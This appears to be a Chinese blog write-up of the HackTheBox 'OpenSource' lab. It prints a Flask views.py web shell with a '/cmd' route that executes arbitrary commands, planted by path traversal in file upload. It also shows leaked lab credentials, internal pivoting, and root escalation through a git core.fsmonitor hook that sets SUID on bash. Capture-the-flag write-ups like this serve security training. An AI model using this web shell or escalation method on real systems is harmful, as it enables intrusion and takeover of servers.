HackTheBox | OpenSource

于 2023-01-16 18:07:29 发布
阅读量189 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/128707843
版权
文章描述了一次通过nmap扫描发现开放端口,利用Flask框架的上传漏洞结合.git目录信息,进一步获取Webshell并切换git分支,找到HTTP代理凭证。之后,利用路径遍历漏洞覆盖原文件实现命令执行,探测内网环境,发现Docker容器,并通过Gitea管理界面登录获取SSH私钥,最终通过进程监控和文件系统操作获得更高权限。
摘要由CSDN通过智能技术生成

HackTheBox | OpenSource

nmap扫描,开放22、80

image-20230115212435417

访问Web服务,看到下载功能,下载后得到压缩文件source.zip

image-20230115212937377

代码目前没有发现太多东西,不过可以知道是使用python开发,且为flask框架

来到上传页面

image-20230115220912671

尝试上传文件,发现上传后可以得到URL

image-20230116092226387

首先想到上传python版本的Webshell,但是好像解析失败了

image-20230116092559183

回到获取到的源文件中,看到.git目录,想到git泄露之类的东西

git log看一下,没有很多commit,但是看到最后一次commit指向了public分支

image-20230116124803829

使用git branch看一下是否存在其他分支,存在dev分支

image-20230116124836659

git checkout dev切换到dev分支,然后检查历史记录

image-20230116124930615

依次show一下,在be4da71987bbbc8fae7c961fb2de01ebd0be1997分支看到http代理,里面写了一对用户名和密码dev01/Soulless_Developer#2022,其余没有太多信息。

image-20230116125008154

分析一下源代码,在views.py中看到整个站点的逻辑,其中/upload对应文件上传页面

image-20230116095335650

在/upload中调用了函数upload_file(),用于接收和处理上传的文件。对于收到的文件,首先获取了文件名get_file_name(),然后进行了路径拼接os.path.join(),然后保存了文件f.save()

参考wp,其中的os.path.join()没有做过滤,可以用于构造特殊路径。

import os

file_name1 = "/etc/passwd"
file_name2 = "passwd"
file_name3 = "../../../../passwd"
print(os.path.join(os.getcwd(), "public", "uploads", file_name1))
print(os.path.join(os.getcwd(), "public", "uploads", file_name2))
print(os.path.join(os.getcwd(), "public", "uploads", file_name3))

image-20230116103636902

所以,当输入路径以/开头时,就可以指定路径。

构造python命令执行的页面,上传一个新的views.py,覆盖原本的文件

import os
import subprocess

from app.utils import get_file_name
from flask import render_template, request, send_file

from app import app


@app.route('/')
def index():
    return render_template('index.html')


@app.route('/download')
def download():
    return send_file(os.path.join(os.getcwd(), "app", "static", "source.zip"))


@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')


@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))

@app.route('/cmd')
def execute():
	return subprocess.check_output(request.args.get('cmd').split(" "))

上传文件,将文件名修改为/app/app/views.py

image-20230116104442203

命令执行

image-20230116104800101

更进一步,直接反弹shell。修改代码,然后访问cmd路径。

image-20230116111151397

image-20230116111204543

检查IP地址,为172.17.0.9

image-20230116111327300

进入根目录,存在.dockerenv文件,说明当前是在docker容器中

image-20230116111402369

上传fscan,进行扫描,看到同网段存在很多机子,其中172.17.0.1页面不同。按理来说172.17.0.1为网关,也就是docker所在物理机,但是从外部访问不到这个端口。

image-20230116112046688

使用nps,搭建反向代理。访问到172.17.0.1:3000,为Gitea,版本为1.16.6

image-20230116113008811

前面获取到了用户名和密码,所以尝试登录。成功登录到后台。

image-20230116125344277

home-backup/.ssh目录下找到SSH私钥,获取后可以直接登录到目标主机上。

image-20230116125543211

image-20230116125612755

检查SUID,没有异常

image-20230116125736581

上传pspy,进行进程监控。发现3个点,定期执行的/app/run.py/root/meta/app/clean.sh/usr/local/bin/git-sync

image-20230116131900266

image-20230116131920247

在主机上找到不到run.py,应该是识别到的docker中的进程;/root/meta/app/clean.sh没有权限;/usr/local/bin/git-sync可读

image-20230116132644208

检查文件内容,为定期对本地/home/dev01备份的脚本

image-20230116132805799

在文章《Securing Developer Tools: Git Integrations》https://www.sonarsource.com/blog/securing-developer-tools-git-integrations/提到了利用方法。

在git的配置文件中,参数core.fsmonitor的值会用来比较所有文件的变化。

找到配置文件/home/dev01/.git/config

image-20230116160529965

先写个简单的文件创建测试一下,保存文件后等待root用户的进程/usr/local/bin/git-sync执行。

image-20230116163843762

image-20230116163902961

利用root权限创建SUID置位的文件,等待执行后得到SUID置位的/bin/bash文件

image-20230116164021258

image-20230116164539500

image-20230116164556104

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Code Reading:The Open Source Perspective
12-25
main Page table of content copyright effective software
[原创]夺棋赛HackTheBox OpenSource攻略
huandaohack的专栏
06-26 2444
夺棋赛HackTheBox OpenSource攻略
Hack The Box -----------------------Active
大方子
12-16 6924
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
连接hack the box教程
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
Open Source Software Notice.pdf
02-28
PDF file11111111111111111111111111111111111111111111111111111111111111111
yberp open source
07-06
# yberp-opensource #### 介绍 开源进销存 上市10多年,长期维护的稳定产品 - QQ群:875823420 ...
qt-opensource-linux-x64-5.12.12.run
最新发布
07-12
qt-opensource-linux-x64-5.12.12.run Qt(官方发音 [kju:t],音同 cute)是一个跨平台的 C++ 开发库,主要用来开发图形用户界面(Graphical User Interface,GUI)程序,当然也可以开发不带界面的命令行(Command ...
Open Source Intelligence Methods and Tools
09-28
Open Source Intelligence Methods and Tools focuses on building a deep understanding of how to exploit open source intelligence (OSINT) techniques, methods, and tools to acquire information from ...
Hack The Box 靶机
PJF1501105594的博客
10-24 2181
Hack The Box 邀请码获取 控制台执行makeInviteCode() 查看返回的json data 然后按照对应的编码格式进行解码,按照要求进行获取邀请码即可 see: https://www.jianshu.com/p/1201a0d2cdfe hackthebox 入门攻略: https://www.360zhijia.com/anquan/439315.html h...
hack the box 连接
mixboot
08-30 8876
hack the box vpn连接1,vpn连接报错2,重新下载连接包3,连接成功 1,vpn连接报错 018-10-20 19:25:57 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 2018-10-20 19:25:57 TLS Error...
hackthebox如何获取邀请码以及配置
Oavinci的博客
02-13 7929
Hack The Box是一个在线平台,注册需要有邀请码 https://www.hackthebox.eu/invite 在console输入 makeInviteCode()得到一串base64 解码得路径: In order to generate the invite code, make a POST request to /api/invite/generate ...
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
杨秀璋的专栏
01-09 2万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,而且用户注册该网站时需要绕过关卡并获取邀请码,涉及审查元素、base64解密、发送post请求等操作,挺有意思的。这是一篇基础性文章,将讲述注册过程、遇到的难点及入门案例,希望对您有所帮助。
靶机渗透_hackthebox__luke -5
qq_34717555的博客
11-11 2145
目标IP10.10.10.137 因为是靶机所以二话不说nmap 扫一下 nmap 获得信息如下: # Nmap 7.70 scan initiated Fri Aug 2 10:51:40 2019 as: nmap -sT -sV -O -T4 -o nmap.scan 10.10.10.137 Warning: 10.10.10.137 giving up on port b...
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 1981
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
【HTB系列】靶机Mischief的渗透测试详解
大方子
01-06 3228
这次的目标靶机是 hackthebox的 Mischief IP地址:10.10.10.92 ====================================================================================== 首先我们用nmap对目标机器进行扫描 nmap -T4 -sV -p- 10.10.10.92 我们访...
hackthebox的网站使用教程
Ba1_Ma0的博客
03-20 1万+
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获取验证码注册教程 网站url:https://blog.csdn.net/qq_45951598/article/details/115269108 然后我们进入网站的首页,这里我们演示的是旧ui,新ui的使用方法与旧的大致相同 使用google浏览器可以自动翻译网站上的英文,右击,然后选择翻译中文
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
Open source
05-19
开源是指软件的源代码公开,所有人都可以自由地查看、使用、修改和分发这个软件。开源软件通常是由一个社区共同维护和开发的,这样可以吸引更多的开发者加入,共同推进软件的发展。开源软件一般都是免费的,用户可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值